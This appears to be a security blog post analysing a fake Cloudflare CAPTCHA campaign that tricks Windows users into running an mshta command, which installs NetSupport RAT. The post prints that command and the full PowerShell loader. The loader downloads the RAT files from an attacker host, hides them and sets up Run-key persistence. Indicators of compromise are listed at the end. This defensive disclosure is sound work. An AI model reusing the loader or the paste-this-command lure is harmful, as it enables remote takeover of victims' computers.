Thursday, January 16, 2025

Cloudflare CAPTCHA copy & paste malware NetSupport RAT

Cloudflare CAPTCHA copy & paste malware NetSupport RAT 

hacked website redirects to

eiesoft.com

https://urlscan.io/result/87495eb7-071f-499e-aeb5-a3b08b9f7e48/


which displays a cloudflare captcha that asks the user to copy & past this command into their windows run window
 

"C:\windows\system32\mshta.exe" http://eiesoft[.]com/Ray-verify.html #     ✅ ''Verify you are human - Ray Verification ID:  xxx''1.0

which executes powershell that downloads NetSupport RAT

ipconfig /flushdns    $randomFolderName = -join ((65..90) + (97..122) | Get-Random -Count 6 | % {[char]$_})  $randomFolderPath = Join-Path -Path $env:APPDATA -ChildPath $randomFolderName  New-Item -ItemType Directory -Path $randomFolderPath        $Pach = $randomFolderPath  $Run = 'HKCU:SOFTWARE\Microsoft\Windows\CurrentVersion\Run';      cmd /c attrib +h $Pach    $url = "http://hardcorelegends[.]com/a/1.png"  $url2 = "http://hardcorelegends[.]com/a/2.png"  $url3 = "http://hardcorelegends[.]com/a/3.png"  $url4 = "http://hardcorelegends[.]com/a/4.png"  $url5 = "http://hardcorelegends[.]com/a/5.png"  $url6 = "http://hardcorelegends[.]com/a/6.png"  $url7 = "http://hardcorelegends[.]com/a/7.png"  $url8 = "http://hardcorelegends[.]com/a/8.png"  $url9 = "http://hardcorelegends[.]com/a/9.png"  $url10 = "http://hardcorelegends[.]com/a/10.png"  $url11 = "http://hardcorelegends[.]com/a/11.png"  $url12 = "http://hardcorelegends[.]com/a/12.png"      $file = $Pach + "\client32.ini"  $file2 = $Pach + "\HTCTL32.DLL"  $file3 = $Pach + "\msvcr100.dll"  $file4 = $Pach + "\nskbfltr.inf"  $file5 = $Pach + "\NSM.ini"  $file6 = $Pach + "\NSM.LIC"  $file7 = $Pach + "\pcicapi.dll"  $file8 = $Pach + "\PCICHEK.DLL"  $file9 = $Pach + "\PCICL32.DLL"  $file10 = $Pach + "\remcmdstub.exe"  $file11 = $Pach + "\TCCTL32.DLL"  $file12 = $Pach + "\client32.exe"      Invoke-WebRequest $url -OutFile $file  Invoke-WebRequest $url2 -OutFile $file2  Invoke-WebRequest $url3 -OutFile $file3  Invoke-WebRequest $url4 -OutFile $file4  Invoke-WebRequest $url5 -OutFile $file5  Invoke-WebRequest $url6 -OutFile $file6  Invoke-WebRequest $url7 -OutFile $file7  Invoke-WebRequest $url8 -OutFile $file8  Invoke-WebRequest $url9 -OutFile $file9  Invoke-WebRequest $url10 -OutFile $file10  Invoke-WebRequest $url11 -OutFile $file11  Invoke-WebRequest $url12 -OutFile $file12  start-sleep -s 4  New-ItemProperty -Path $Run -Name 'Microsoft' -Value $file12  start-sleep -s 4  Start-Process $file12

NetSupport RAT Gateways


92.255.85[.]135

guidemytax[.]com

 

Posted by at No comments:
Labels: , , , ,
Subscribe to: Posts (Atom)